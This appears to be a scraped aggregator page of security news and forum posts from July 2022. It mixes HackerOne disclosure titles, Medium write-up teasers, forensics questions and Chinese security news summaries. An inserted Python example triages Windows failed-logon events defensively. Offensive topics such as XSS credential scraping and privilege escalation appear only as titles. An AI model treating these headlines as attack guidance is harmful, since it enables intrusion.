    Hello guys, it’s Selim back here with another interesting article. In the previous article, we learn about how and why a beginner should… Continue reading on Medium »
    Appointment Starting Point HackTheBox Writeup.
    Appointment is a very good lab to practice for database-related security issues. So in this writeup [walkthrough] we are going to exploit… Continue reading on Medium »
  • Open

    google home page
    Hello, I don't know if it is normal or not? But instead of being google.com, my Google home page looks like this: google.com/webhp?client=ms etc Is this normal or not? submitted by /u/nintenboye [link] [comments]
    Autoupdate Weak Passwords
    Is there a service that will allow me to import all of my usernames and passwords, then simply click a button and it will go and automatically strengthen all of my weak passwords on each of the sites where my security is lacking? submitted by /u/thats_taken_also [link] [comments]
    Bruteforce admin account on DC from unknown device
    In the DC logs, I found that there were 5,000+ failed logon attempts from an unknown device (that definitely is not one of ours) to one of our admin accounts. How would you start an investigation? What I did: I checked the VPN logs. Maybe someone logged in to our corporate network via VPN, but nothing found. I also have a hypothesis that maybe the attacker is not connected to the internal network; there are some external services that are using AD creds for authentication. So, the attack was from external to internal. But, I don't know how to check this. submitted by /u/athanielx [link] [comments]
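    A first-pass triage for the situation in the post above, as an added example written for this page (not the poster's own work or any product's code): group the failures against the target account by source, then let what the DC can and cannot tell you decide where to pivot. The event records are constructed; their field names follow Windows Security events 4625 (failed logon) and 4776 (NTLM credential validation). The internal address ranges are an assumption.

```python
"""Added example (editor's, not the poster's): triage failed-logon telemetry on
a domain controller.  Records are constructed; field names follow Windows
Security events 4625 and 4776.  Internal address space is an assumption."""
from collections import Counter, defaultdict
from datetime import datetime, timedelta
import ipaddress

INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]  # assumption

STATUS_MEANING = {  # NTSTATUS values seen in 4625 SubStatus and 4776 Status
    "0xC000006A": "wrong password",
    "0xC000006D": "bad user name or authentication information",
    "0xC0000064": "user name does not exist",
    "0xC0000234": "account locked out",
}


def make_samples():
    """Constructed sample: 5,000 NTLM validation failures relayed to the DC as
    4776 with a client-supplied workstation name, plus two ordinary 4625s."""
    t0 = datetime(2022, 7, 29, 2, 14, 0)
    events = [{"EventID": 4776, "TimeCreated": t0 + timedelta(seconds=i / 2),
               "PackageName": "MICROSOFT_AUTHENTICATION_PACKAGE_V1_0",
               "TargetUserName": "admin.jsmith", "Workstation": "UNKNOWN-PC",
               "Status": "0xC000006A"} for i in range(5000)]
    events.append({"EventID": 4625, "TimeCreated": t0 - timedelta(hours=1),
                   "TargetUserName": "admin.jsmith", "IpAddress": "10.1.5.20",
                   "WorkstationName": "DESKTOP-AB12", "LogonType": 3,
                   "AuthenticationPackageName": "NTLM", "SubStatus": "0xC000006A"})
    events.append({"EventID": 4625, "TimeCreated": t0, "TargetUserName": "svc_backup",
                   "IpAddress": "10.1.9.4", "WorkstationName": "SRV-BK01",
                   "LogonType": 3, "AuthenticationPackageName": "NTLM",
                   "SubStatus": "0xC0000234"})
    return events


def source_of(ev):
    # 4625 carries the caller's IP; 4776 only carries the workstation name the
    # NTLM client *claimed*, which is attacker-controlled and may be blank.
    if ev["EventID"] == 4625:
        return ev.get("IpAddress") or ev.get("WorkstationName") or "-"
    return ev.get("Workstation") or "-"


def classify(source):
    try:
        ip = ipaddress.ip_address(source)
    except ValueError:
        return "hostname-only"
    return "internal-ip" if any(ip in n for n in INTERNAL_NETS) else "external-ip"


def triage(events, target_user):
    """Group failures against one account by source and summarise volume, rate,
    event types and status codes; busiest source first."""
    buckets = defaultdict(lambda: {"count": 0, "event_ids": set(),
                                   "statuses": Counter(), "first": None, "last": None})
    for ev in events:
        if ev["TargetUserName"].lower() != target_user.lower():
            continue
        b = buckets[source_of(ev)]
        b["count"] += 1
        b["event_ids"].add(ev["EventID"])
        b["statuses"][ev.get("SubStatus") or ev.get("Status")] += 1
        t = ev["TimeCreated"]
        b["first"] = t if b["first"] is None or t < b["first"] else b["first"]
        b["last"] = t if b["last"] is None or t > b["last"] else b["last"]
    rows = []
    for src, b in buckets.items():
        minutes = (b["last"] - b["first"]).total_seconds() / 60
        rows.append({"source": src, "kind": classify(src), "count": b["count"],
                     "event_ids": sorted(b["event_ids"]),
                     "rate_per_min": b["count"] / minutes if minutes else float(b["count"]),
                     "statuses": {k: STATUS_MEANING.get(k, k) for k in b["statuses"]}})
    return sorted(rows, key=lambda r: -r["count"])


def next_pivot(row):
    """Where to look next, given what the DC can and cannot tell you."""
    if row["kind"] == "hostname-only" and 4625 not in row["event_ids"]:
        return ("NTLM pass-through: the DC validated credentials on behalf of a member "
                "server, so the real client address is in that server's own logs "
                "(VPN/RADIUS, OWA/IIS, RD Gateway, LDAP-bound apps), not on the DC")
    if row["kind"] == "external-ip":
        return "direct Internet source: find what exposes authentication to it"
    return "internal host: identify the owner via DHCP/NAC and triage the endpoint"


if __name__ == "__main__":
    for row in triage(make_samples(), "admin.jsmith"):
        print(row["count"], row["source"], row["kind"],
              f"{row['rate_per_min']:.0f}/min", row["event_ids"], row["statuses"])
        print("  ->", next_pivot(row))
```

    The test the poster's hypothesis needs is the one `next_pivot` encodes: if the DC only has 4776 records for the account and no 4625 with an IP, the credentials were validated on behalf of another server, so the VPN logs were the right idea but the same check has to be repeated on every member server that authenticates users with AD (web mail, RADIUS, RD Gateway, LDAP-integrated applications). The workstation name in 4776 is supplied by the client, so a value like "UNKNOWN-PC" identifies nothing on its own.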
    How does an app like “Flightradar24” know that I have gotten to an airport/a location.
    When I arrive at an airport I get a notification from the Flightradar app on my iPhone that welcomes me to the airport (here’s a screenshot: https://postimg.cc/n91HvFS9). I just don’t understand how the app knows that even though it is running in the background and has only "while using" turned on in the location settings. Of course my #1 worry is privacy, like does that mean it is constantly grabbing my location just to display that notification once in a while when I go to the airport, and #2 how does this impact battery life. If the app can discreetly get my location in the background, can other apps do this? And how would I turn that off? I really don’t need Facebook or TikTok knowing where I am. (If the answer is obvious don’t absolutely roast me please lol) submitted by /u/SmallIce4 [link] [comments]
    Password manager for life
    Hi, I am currently looking to get a password manager to install on my computer that I'd keep for countless years. I don't mind paying a price (small per month) or big upfront. But I have a question about services like Bitwarden with a monthly subscription. If the company fails or something along those lines, how would the system still work? I prefer an upfront payment anyway, but the monthly payment for things such as these has always been bugging me. Looking forward to your answers! submitted by /u/Simon__Puech [link] [comments]
    Information Security Compliance Jobs
    Hello, I didn’t know where to post this so I’m asking here as this subreddit seemed relevant. I’m an IS and IT compliance professional in Pakistan and have been working in the domain for the past six years, mainly at consulting firms (Deloitte and KPMG) in Pakistan. I’ve recently switched to an insurance company in my country as an Information Security Manager, but our country has been doing really badly economically, which is the reason I’ve been looking into remote jobs that could potentially pay in USD or any other foreign currency. I always planned on moving abroad to pursue a career, but that isn’t possible right now because of my family, which is why I’m inquiring about where I can find remote jobs in the domain. PS sorry if I made mistakes typing this as I’m on my phone and English isn’t my first language. submitted by /u/ads496 [link] [comments]
  • Open

    I'm Building a Self-Destructing USB Drive.
    submitted by /u/Machinehum [link] [comments]
    Critical Vulnerability Affecting Arris / Arris-variant DSL/Fiber Routers
    submitted by /u/sanitybit [link] [comments]
    ImHex - A Hex Editor for Reverse Engineers, Programmers and people who value their retinas when working at 3 AM
    submitted by /u/CyberMasterV [link] [comments]
    Manipulating Windows Tokens with Go
    submitted by /u/sciencestudent99 [link] [comments]
    Disclosing information with a side-channel in Django
    submitted by /u/albinowax [link] [comments]
  • Open

    South Park episodes in Fullscreen (4:3)
    SP 4:3 In this folder are the first 11 and 1/2 seasons of South Park in 4:3 Fullscreen before they were rerendered in 16:9 widescreen. The second half of season 12 is not included, as those episodes were actually originally produced in widescreen, but cropped into fullscreen for early TV airings and DVD releases. As of now, episodes are still being added, so if you notice that a season or episode is not included, don't worry, it'll all be there within the next couple of days. I don't have all of seasons 9 and 10 yet, so they may take an extra day or so. Edit: From the looks of it, I won’t be able to get season 10. If I find them, this post will be updated. submitted by /u/ImagineDraggin9 [link] [comments]
  • Open

    OSINT Tool — Emporis
    I heard about the website Emporis.com while on holiday reading the book “A Burglar's Guide to the City” by Geoff Manaugh. I just want to… Continue reading on Medium »
    War in Ukraine / July 28
    Day 156: The tragedy in Olenivka Continue reading on Medium »
    Leaks: find and stop
    I was prompted to this topic by numerous publications of leaks of confidential information from internal databases of state bodies, which… Continue reading on Medium »
  • Open

    SecWiki News 2022-07-29 Review
    EMBA - The firmware security analyzer, by ourren; VulnLab: Web Application Vulnerabilities Lab, by ourren; Vajra - Your Weapon To Cloud, by ourren; APT trends report Q2 2022, by ourren; [HTB] October Writeup, by 0x584a. For more recent articles, visit SecWiki.
  • Open

    Clean definition of physical vs. logical data extraction?
    Hi there, it seems to me, that it's not that easy to very precisely define the difference between physical and logical data extraction. I tried something like: "physical data extraction means copying the data bitwise from the source whereas logical extraction involves some kind of interpretation of the data with any software." But it doesn't feel like it's all. Do you see my problem? submitted by /u/Knuust [link] [comments]
    Encase won't open HFS+ Hard Drive
    Hi everyone, we have got two very similar hard drives with nearly the same problem. The hard drives are external USB disks, both with an HFS+ case-sensitive, non-journaled filesystem. When we try to open them in EnCase 21 or 22 we get the error message "string or blob too long". We are currently trying to figure out whether any of the files or folders are corrupt by exporting them with GetData Forensic Explorer, because this tool can open the hard drives but has problems exporting all of the files. Has anyone had this error message in EnCase and can tell me where or what the problem is? submitted by /u/Ready_Note6642 [link] [comments]
    What weapons of choice are in your forensics workstation software repertoire? Post your builds!
    I've just upgraded my workstation and bought an absolute beast of a laptop. I've begun the process of listing all my programs, apps, software, keys and tools and other useful bits and pieces that I have gathered over time on my main workstation PC, and I am using the opportunity of a fresh rebuild on the upgraded workstation and the beast of a laptop to tidy everything up and really streamline the whole setup with the new hardware. My programs and apps are mostly geared towards mobile forensics, and are as follows: iPhone Backup Extractor, Oxygen Forensic Detective, Oxygen Data Extraction Wizard, Oxygen Forensic Call Data Expert, Oxygen Forensic Cloud Extractor, Axiom Process, Axiom Examine, Autopsy (+ modules), iPhone Backup Extractor, iMazing, RazorSQL, SQLite DB Browser, SQL Database Recovery, SQLite Forensic Explorer, DCode Timestamp Converter, FTK Forensic Toolkit, Notepad++, hex editors (various programs), DrFone (Android and iOS), Stella Data Recovery, Stella iPhone Recovery, Stella OST Converter, VLC Media Player + codec packs, most of the NirSoft tools (some nifty little things there!). Can anyone think of anything super useful that I haven't got? Mostly mobile forensics related stuff as you can see, that's my main area of interest, but there are a few broad covers there too ;) What do you consider the essential tools, programs and software that you have on your workstation? submitted by /u/dothepropellor [link] [comments]
  • Open

    Threat Hunting Techniques, Tactics and Methodologies
    submitted by /u/Successful_Mix_8988 [link] [comments]
    Red Team Field Manual V2 by Ben Clark and Nick Downer has been released
    submitted by /u/ulriken_ [link] [comments]
  • Open

    IW Weekly #12: $O to $150,000/month mindset, Zoom RCE, Abusing FB Features, Bypass CSRF Protection…
    No content preview
    How this team accidentally found a SSRF in Slack exposing AWS credentials! A $4000 bug bounty
    No content preview
  • Open

    FreeBuf Morning Report | US court system hit by major attack; senior Ukrainian cyber official comments on the Russia-Ukraine cyber war
    The US court system suffered a major attack, putting sealed documents at risk; a nuclear safety system in Spain was attacked by hackers, with service in some regions disrupted for months.
    FreeBuf Weekly | 51 apps called out by the Shanghai Communications Administration; big-data price discrimination to be severely punished; US and UK reach data access agreement; Web3 financial losses hit record high
    Happy weekend, Buffers; here is this week's FreeBuf Weekly.
    Guide to installing an SSL certificate on a Domino server
    Guide to installing an SSL certificate on a Domino server.
    Security risks of enterprise outsourcing and how to respond | FreeBuf customer-side group discussion
    In security, outsourcing is often the weak link. What security risks do outsourced teams bring to an enterprise, and how should we address the problems outsourcing introduces?
    US expected to expand cybersecurity partnership with Ukraine
    The US government's cybersecurity agency has signed an agreement with its Ukrainian counterpart to strengthen cooperation on cybersecurity.
    Jinan University Institute of Information Technology hiring plan for cybersecurity staff
    The Jinan University Institute of Information Technology is recruiting a cybersecurity services project manager, network technical support engineers, cybersecurity engineers (offensive/defensive track) and others.
    Microsoft says it found an Austrian spyware vendor using Windows and Adobe 0-days against European organisations
    Microsoft's security and threat intelligence teams say they found an Austrian company, DSIRF, selling spyware built on previously unknown Windows vulnerabilities.
    Google again delays plan to disable third-party cookies
    Google said on Wednesday that it is once again postponing its plan to disable third-party cookies in the Chrome browser.
    More and more victims refuse to pay ransoms
    Both the share of victims paying ransoms and the amounts paid are falling, a trend that has continued since Q4 2021.
    Microsoft SQL servers hacked, bandwidth hijacked
    Attackers compromise Microsoft SQL servers using adware-bundled software or outright malware, turning the machines into servers rented out as online proxy services for profit.

  • Open

    Domain Enumeration Methodology
    Hey folks, today I start a new series of articles to discuss Active Directory Exploitation. This is the first article, we focus on domain… Continue reading on Medium »
    Sticky Notes is it safe?
    What if i told you it’s better to forget your password than write it down into a sticky note. Continue reading on Medium »
    Linux privilege escalation by abusing sudo
    In Linux, sudo stands for “super user do”. Whenever you execute a command in Linux and prefix it with sudo, it is executed with root… Continue reading on Medium »
  • Open

    HTML Injection via TikTok Ads Email Share
    TikTok disclosed a bug submitted by lu3ky-13: https://hackerone.com/reports/1376990 - Bounty: $1000
    Twitter Account hijack through broken link in https://runpanther.io
    Panther Labs disclosed a bug submitted by prakash142: https://hackerone.com/reports/1607429 - Bounty: $100
    Hijack all emails sent to any domain that uses Cloudflare Email Forwarding
    Cloudflare Public Bug Bounty disclosed a bug submitted by albertspedersen: https://hackerone.com/reports/1419341 - Bounty: $6000
    Acronis True Image Local Privilege Escalation Due To Race Condition In Application Verification
    Acronis disclosed a bug submitted by vkas-afk: https://hackerone.com/reports/1251464 - Bounty: $250
    Off-by-slash vulnerability in nodejs.org and iojs.org
    Internet Bug Bounty disclosed a bug submitted by nagaro: https://hackerone.com/reports/1650273 - Bounty: $1200
  • Open

    nanopb Protobuf Decompiler - Anvil Secure
    submitted by /u/anvilventures [link] [comments]
    Building AppSec Pipeline for Continuous Visibility
    submitted by /u/nicksthehacker_ [link] [comments]
    Extracting Ghidra Decompiler Output with Python
    submitted by /u/dinobyt3s [link] [comments]
    Railway cybersecurity in the era of interconnected systems
    submitted by /u/sanitybit [link] [comments]
    Vulnerable by Design: Azure Red Team Attack and Detect Workshop
    submitted by /u/sanitybit [link] [comments]
    Abusing Duo Authentication Misconfigurations in Windows and Active Directory Environments
    submitted by /u/sanitybit [link] [comments]
    Spear Phishing on Modern Platforms
    submitted by /u/sanitybit [link] [comments]
    Passkeys: a push to take WebAuthn to the masses
    submitted by /u/sanitybit [link] [comments]
    Scraping Login Credentials With XSS
    submitted by /u/sanitybit [link] [comments]
  • Open

    Reading Message from Microsoft’s Private Yammer Group
    Hi All, Continue reading on Medium »
    Weak Session IDs (Low - Security) | DVWA Writeup
    Session hijacking is a good place to start a career in bug bounty. This walkthrough will assist you in mastering the knowledge and skills. Continue reading on Medium »
    XSS in Open Redirect which uses attribute rel=”noopener follow” target=”_blank” via modern browser
    Hi everyone Continue reading on Medium »
    IW Weekly #12: $O to $150,000/month mindset, Zoom RCE, Abusing FB Features, Bypass CSRF Protection…
    Hey 👋 Continue reading on Medium »
    How I became a millionaire in 3h | Fintech Bug Bounty — Part 1
    Lately, I’ve been doing some pentesting on a bank. It’s not like they hired me, but I felt curious about their infrastructure and asked… Continue reading on Medium »
    Why this SIMPLE mistake earned a $5000 bug bounty from Reddit
    Moral of the story — be careful when you refactor code Continue reading on InfoSec Write-ups »
    Bug write-up on the UIN Maulana Malik Ibrahim application
    This time I will describe my experience with a bug I found in the application of UIN Maulana Malik Ibrahim Malang. Continue reading on Medium »
    GALAXYBLITZ BETA CAMPAIGN $100,000 TO BE SHARE
    Galaxy Blitz is a Play To Earn strategy NFT game where you lead the descendants of humanity to forge a new empire. Continue reading on Medium »
  • Open

    Nothing new or spectacular just having some fun. Golang redteaming.
    submitted by /u/allbetsroffnow [link] [comments]
  • Open

    dotnetfile Open Source Python Library: Parsing .NET PE Files Has Never Been Easier
    The dotnetfile library extracts useful information from .NET PE files and can overcome common techniques malware authors use to break parsing. The post dotnetfile Open Source Python Library: Parsing .NET PE Files Has Never Been Easier appeared first on Unit 42.
  • Open

    Windows and Linux Authentication Bypass with new version of AIM (+ virtual DD)
    submitted by /u/DFIRScience [link] [comments]
    How long does it take cellebrite to get back with a quote?
    I am doing a lab refresh and have contacted cellebrite for a quote, I had a call with them, then never heard back. It's has been over a week. Is this normal? Also if you were doing a lab refresh, what would be your dream setup? submitted by /u/MDCDF [link] [comments]
    SANS FOR585 index?
    Does anyone have a SANS FOR585 index that I could see? I'm curious whether mine is adequate. submitted by /u/tankton [link] [comments]
    Android 12 / Verizon / sms recovery
    Corporate investigation, not criminal. Sent phone away, forensic company sent it back saying they couldn’t do anything with it. So I said might as well take a stab at it. Using MobilEdit for recovery since I know very little about Android. Pull a logical dump of the phone, get everything off the phone but nothing shows up in its deleted data scan. Take Samsung Smart Switch backup to PC, save for later. Peruse XDA forums, find that the phone's bootloader is not unlockable, so no root access for me. Thanks Verizon. Boot to Tsurugi, use Android Triage, but nothing helpful there. See that MobilEdit can import a Smart Switch backup, try to import the one I took earlier, but it can’t read it, can only read backups to SD card. Ok then, go get a microSD card and USB-C connector, attach it…an…
    Trying to recover Messenger Conversation
    I already tried downloading Personal Data multiple times. Its not there. The chats were 3 weeks ago at most. Any tips? submitted by /u/SaqMadique [link] [comments]
  • Open

    Currently working workers.dev sites
    https://xp3.xev.workers.dev https://drive.spidercloud.workers.dev/1:/ https://cloud.eleventh-hour.workers.dev/0:/ https://www.savage69.workers.dev/0:/ https://otmbd01.sasohan.workers.dev https://td.lightdrive.workers.dev/1:/ https://mydrive.rahul112kapoor.workers.dev/0:/ https://netflixcrew.rahulinstinct.workers.dev/0:/ https://punishermirror.punisher876.workers.dev/0:// https://animated0.archives.workers.dev/ https://ps4.td-index.workers.dev/0:/ https://sparkling-sea-1d6d.bakingsoda.workers.dev (The first one is mine) Pastebin submitted by /u/ilikemacsalot [link] [comments]
    D&D Books
    http://www.dnd.etherealspheres.com/eBooks/ A couple NSFW books submitted by /u/c-rn [link] [comments]
  • Open

    Looking for someone to do vulnerability research and develop exploits together.
    Greetings my fellow exploit developers, I hope you are doing well. As the post title says, I am looking for someone to do some real-world vulnerability research with and develop some exploits when we find something. I am having problems keeping myself motivated when I am not finding anything, which leads to me dropping the project and doing something else, usually unrelated to exploit dev and vulnerability research. I hope to find someone or a small group of people who are having similar problems so that we can keep each other motivated by talking every day, sharing each other's findings and learning something new together. This is my thought process and the reason why I am making this post. So if there is anyone out there who thinks something like this can help us, please feel free to reach out to me in DM, chat or comments :) Thanks. submitted by /u/CJtheDev [link] [comments]
  • Open

    War in Ukraine / July 27
    Day 155: Above 40 hryvnias per dollar Continue reading on Medium »
  • Open

    Multiple Successful log ins from Internet explorer on my Microsoft account
    Okay so yesterday I went and checked my login activity since I hadn’t checked in about a week, and when I looked I noticed that there was a successful login five days ago from Internet Explorer; as well, when you expand it to see more info on it I saw that it had multiple times asked for additional verification. Strangely it was all from my own IP address. I have 2FA active, so if anyone even tried to log into my account I would need to approve it first, so I have no idea how Internet Explorer signed into my account successfully, even asking for additional information. As well, I checked again this morning and there were two more times IE successfully logged in. I have scanned my computer and nothing came up; I have also already changed my password for my account. submitted by /u/Alphem_384 [link] [comments]
    Pentesting
    I need advice on an effective tool for pen testing apps hosted on AWS. submitted by /u/dazkaly [link] [comments]
  • Open

    SecWiki News 2022-07-28 Review
    Notes on a large authorized internal-network lateral movement engagement in a non-domain environment, by 路人甲; FIRST 2022 talk roundup, by Avenger. For more recent articles, visit SecWiki.
  • Open

    FreeBuf Morning Report | Spain arrests hackers who sabotaged a radiation alert system; cost of a data breach hits record high
    The cost of a data breach hits a record high.
    The DiDi penalty case from a permissions perspective
    A look at the permissions cited in the DiDi penalty decision for unlawfully collecting users' personal information; you can audit the permissions of the apps you use every day in the same way.
    Attack count hits an all-time high | Reading the Web3 Security Quarterly Report
    CertiK recently published its Web3 Security Quarterly Report (Q2 2022 edition), describing the state of security across Web3.
    No escape after leaving: Uber assists the DOJ in prosecuting its former CSO
    Uber reached a non-prosecution agreement with the US Department of Justice over a 2016 hacking incident; the price is that Uber agreed to help the DOJ prosecute its former Chief Security Officer, Sullivan.
    Analysis | The situation in Eastern Europe is shaping the global DDoS landscape
    Research finds that DDoS attacks are being actively used for political ends.
    IBM Cost of a Data Breach report released; breach costs hit record high
    IBM has released its latest Cost of a Data Breach report.
    New phishing platform Robin Banks emerges, targeting well-known financial institutions in several countries
    A new phishing-as-a-service platform has recently appeared, offering ready-made phishing kits aimed at customers of well-known banks and online services.
  • Open

    Why this SIMPLE mistake earned a $5000 bug bounty from Reddit
    No content preview
    How to Install Elastic Stack on Ubuntu 22.04 LTS
    No content preview

  • Open

    Threat Brief: Microsoft Critical Vulnerabilities (CVE-2022-26809, CVE-2022-26923, CVE-2022-26925)
    We provide an overview of CVE-2022-26809, CVE-2022-26923 and CVE-2022-26925, along with recommendations for mitigation. The post Threat Brief: Microsoft Critical Vulnerabilities (CVE-2022-26809, CVE-2022-26923, CVE-2022-26925) appeared first on Unit 42.
  • Open

    AWS Security(S3 buckets, ec2 snapshots, leaked aws keys)
    flaws.cloud challenge Continue reading on Medium »
    HackTheBox | Jerry | Write-up
    Hey Guys, Continue reading on Medium »
    GSuite domain takeover through delegation
    Continue reading on InfoSec Write-ups »
  • Open

    10TB+ of Movies/TVShows, fast connection, couple of NSFW movies.
    submitted by /u/Pukit [link] [comments]
    Daft Club Directory (not fully archived but most links still work)
    submitted by /u/sastofficiallol [link] [comments]
    brewing and distillation guides
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
  • Open

    Axiom pictures
    Looking at an image in Axiom. There are 97,000 images; 95,000 are Windows system or program default pictures. I'm looking for a single picture of contraband. Is there a way to prevent the stock Windows images from showing up? I’m looking for a setting to prevent seeing all the stock pics. Thanks in advance. submitted by /u/TxProud [link] [comments]
    Incident response and forensic practitioner survey
    I am looking for people with incident response and/or forensics experience to contribute towards an industry survey, designed to help identify ways of optimising service delivery and identify common issues facing IR teams. If you work in an incident response team at any level (junior, senior, or director) and/or conduct forensics following system compromises, please consider responding to my survey. It will only take 5 - 10 minutes, and your support would be greatly appreciated: https://forms.office.com/r/5NtbWAhNWe This is an anonymous survey, but there is the option to leave your email address so that you can stay informed about the results. If you'd prefer not to have your email linked to your submission, please DM me instead. submitted by /u/QoTSankgreall [link] [comments]
    How many drivers are loaded in memory at any given time (rough estimate)?
    I understand that circumstances vary, but what is your rough estimate? Consider a normal user workstation. Thanks, DBR submitted by /u/DeadBirdRugby [link] [comments]
    Software piracy investigation
    Can someone let me know how to forensically identify installation of pirated software? What are the artifacts we should look for? submitted by /u/Pepperknowsitall [link] [comments]
    Are professional organizations worth it?
    Hi, I am wondering if joining a professional organization is worth it. If it is, what are some you recommend for computer forensics and computer engineering (this will be crossposted to both subs)? submitted by /u/swatteam23 [link] [comments]
    ZIP file corrupt/not right format
    I'm currently undergoing a university assignment that requires analysis of an image file and finding evidence to prove illegal activity. I've come across a ZIP file but when extracting it and inspecting it I was met with an error "corrupt/not right format". I know this file has something important but it doesn't seem to have a standard encryption to it. Are there any methods of inspecting this file further to see if it contains any data or is being masked as a ZIP? (FTK manager wouldn't open it, neither would WinRAR) submitted by /u/fgtethancx [link] [comments]

    AlienVault OSSIM logging?
    So I have OSSIM (but not USM) on a VM and was wondering: The official site says that OSSIM doesn't have log management, but does that mean that it's simply unable to, say, forward logs to a syslog server? Does OSSIM store logs? If so, how can I see how much storage those logs are taking up, and if not, how does OSSIM store its data then? submitted by /u/QueenofCodeNow [link] [comments]
    Help needed: plan of action to grow my tool set in regards to forensics and security
    TL;DR: I'm looking to make a plan of action to gain core knowledge on scripting and operating systems within the context of security. I'm curious to hear your thoughts on what such a plan could look like and what home projects/education platforms could help achieve this. Hi all, I recently applied for a forensics job, but failed the assessment (which was expected). I'm CompTIA Net+ & Sec+ certified, but run into problems when I need to do hands-on work. It should be noted the job was a medior/senior function, but I decided to give it a shot anyway for the learning experience, which made it extremely valuable. Things I ran into in this particular assignment: basic OS functionality on Windows & Linux: what are the interesting places to start your research and how to securely assess them (processes, bash history, etc.); bash scripting; python scripting. I've done plenty of Hack The Box, but feel that the guided learning method keeps me from retaining the information. I might have the option to do a funded 10-week full-time full-stack development course, but that might be overkill and out of scope. I also have a home server which allows me to experiment; I'm just not sure for now how to utilize it to full effect, besides securing the network as well as possible. Thank you for taking the time to read and for any advice you might have. submitted by /u/-Column- [link] [comments]
    Simple site Security audit - NoSQL injection, buffer overflow...
    Hi! I'm new to security auditing and I have to do it. In college we got a task to do about pen-testing a site with: Node.js, Express.js, Pug, MongoDB. This is a simple "kitchen blog"; you can post your recipes there. (Anticipating the questions: ethical hacking is not my job, not my field of study. The only thing I want is help, not for anyone to do it for me!) I have already done things like: Password confirmation on the register page is wrong, you can set a different second password. There is no data encryption between us and the server, the password is visible (login and registration). Permissions issue: a normal user can delete another user's account. NoSQL injection, a few different ways (I don't know if I did it right). User info update issue and small stuff about validating the inserted data. So after good research I do not know if I did the NoSQL injection right (NoSQL is not common to test, I think). Maybe I need confirmation that I did this right. Things I need to test: Buffer overflow, NoSQL injection, Canonical form. Are there any tips, videos, articles that you can recommend for that? I have been watching and reading a lot of stuff. Of course I'm doing research and I'm fighting with this another day... I think this is an unusual post that will make you smile and help :D submitted by /u/puperinoo [link] [comments]
    Vulnerability analysis and information disclosure
    Hello folks, I was tasked to perform vulnerability analysis inside the corporate network and find any useful/disclosed information (publicly available IPs, shared printers/folders, files with passwords, routers with a default password, open ports, internet-exposed services/admin panels, etc.). Any information that I can find as a threat actor inside the target network. I had never done this before, this is my first task of this type; mostly I work on SOC analyst stuff (phishing investigation, traffic monitoring, etc.). Could you please suggest any guides/articles/tools/checklists/books for achieving this goal and performing this analysis? I need to create a report with all findings. submitted by /u/TRYH0 [link] [comments]

    Creating Sock Puppet Accounts: Everything You Need To Know — Part 3.1
    Hey Folks! I hope you liked part -2 of my OSINT series. Continue reading on Medium »
    War in Ukraine / July 26
    Day 154: The number one goal is the Antonovsky bridge Continue reading on Medium »

    Corrupting memory without memory corruption
    submitted by /u/surrealisticpillow12 [link] [comments]
    Untangling KNOTWEED: European private-sector offensive actor using 0-day exploits
    submitted by /u/surrealisticpillow12 [link] [comments]
    Sternum Announces Free Security and Observability Platforms for OpenWrt IoT Devices
    submitted by /u/mesok8 [link] [comments]
    For 12 Hours, Was Part of Apple Engineering’s Network Hijacked by Russia’s Rostelecom?
    submitted by /u/danyork [link] [comments]
    Inside Matanbuchus: A Quirky Loader
    submitted by /u/jat0369 [link] [comments]

    MSA Weekly 5 — “How to Get Sensitive Data Exposure on Web Application”
    Hello Readers, Continue reading on Medium »
    TryHackMe RootMe Machine Solution
    Stages: Continue reading on Medium »
    GSuite domain takeover through delegation
    Continue reading on Medium »
    MSA Weekly 5 [How to Get Sensitive Data Exposure on Web Application ]
    Data Sensitive Exposure Continue reading on Medium »
    Approaching a Wordpress Site for Bugs :)
    Hi Geeks, This is Aravind here with another blog which may help you find bugs on WordPress sites easily. I have also attached a few of… Continue reading on Medium »
    How a Race Condition made these crypto hackers $5000 bug bounty
    Moral of the story — test concurrent requests Continue reading on InfoSec Write-ups »
    ALLIANCEBLOCK TESTNET BUG BOUNTY QUICK GUIDE
    About AllianceBlock Continue reading on Medium »

    SecWiki News 2022-07-27 Review
    DeepJIT: an end-to-end deep learning framework for just-in-time defect prediction by ourren; Just-in-time defect prediction based on AST change embeddings by ourren; For more recent articles, visit SecWiki

    Microsoft again reverses course, will block macros by default
    submitted by /u/ulriken_ [link] [comments]

    Catch from HackTheBox — Detailed Walkthrough
    How a Race Condition made these crypto hackers $5000 bug bounty

    FreeBuf Morning Report | Uber settles the hacking case with the US Department of Justice; the Port of Los Angeles suffers 40 million attacks a month
    Uber has reached a settlement with the US Department of Justice over its cover-up of the November 2016 data breach, agreeing to the prosecution of its former Chief Security Officer Joseph Sullivan.
    All about stack pivoting
    This article aims to lead the reader step by step through the principles of stack pivoting and its application in CTFs, in a principles-plus-worked-examples format.
    Within 15 minutes of vulnerability disclosure, hackers have already finished scanning for it
    A research report shows that attackers scan for vulnerable endpoints within 15 minutes of a new CVE being publicly disclosed.
    Malicious apps on the Google Play store downloaded more than 10 million times
    The antivirus team at Dr. Web found a batch of Android applications in the Google Play store stuffed with adware and malware.
    US university publishes a major report exposing the government's ongoing scheme to surveil the public
    The Center on Privacy & Technology at Georgetown Law released a report revealing that US Immigration and Customs Enforcement has built a surveillance system that bypasses the law to place US citizens under near-total surveillance.
    Lockbit again attacks public-sector bodies in two localities
    The Lockbit ransomware gang, extremely active recently, has again attacked equipment belonging to two local governments.
    Tophant (斗象科技) again listed in the CCSIP 2022 China Cybersecurity Industry Panorama
    Tophant was selected in 12 major categories and 27 sub-segments of the panorama.
    Microsoft: IIS extensions increasingly used as Exchange backdoors
    Attackers are increasingly using malicious Internet Information Services (IIS) web server extensions to deploy backdoors on unpatched Exchange servers.
    Selected talk videos from the attack-and-defense exercise track now online | CIS Conference Summer Edition
    On July 27, some talks from the CIS core forum track "Live-network Confrontation and Attack-and-Defense Exercises" went online as public lectures!
    Online reading edition: full text of the "2022 China Software Supply Chain Security Analysis Report"
    Although the "Log4Shell" vulnerability had an unprecedented impact, critical foundational open-source software still does not get enough attention. We should draw broader lessons from this incident, systematically inventory critical foundational open-source software such as Log4j2, carry out vulnerability checks and hardening at the foundation layer, and adopt stronger, targeted security protections.

    Burp Suite certification: a year in review
    It’s been a year since we launched our Burp Suite Certified Practitioner exam, so we’ve been reflecting on some of the improvements and developments we’ve made across both our preparation materials an

    Reflected Cross Site Scripting on User Agent-Dependent Response
    Hello folks, Continue reading on Medium »

    HTML Injection via Email Share
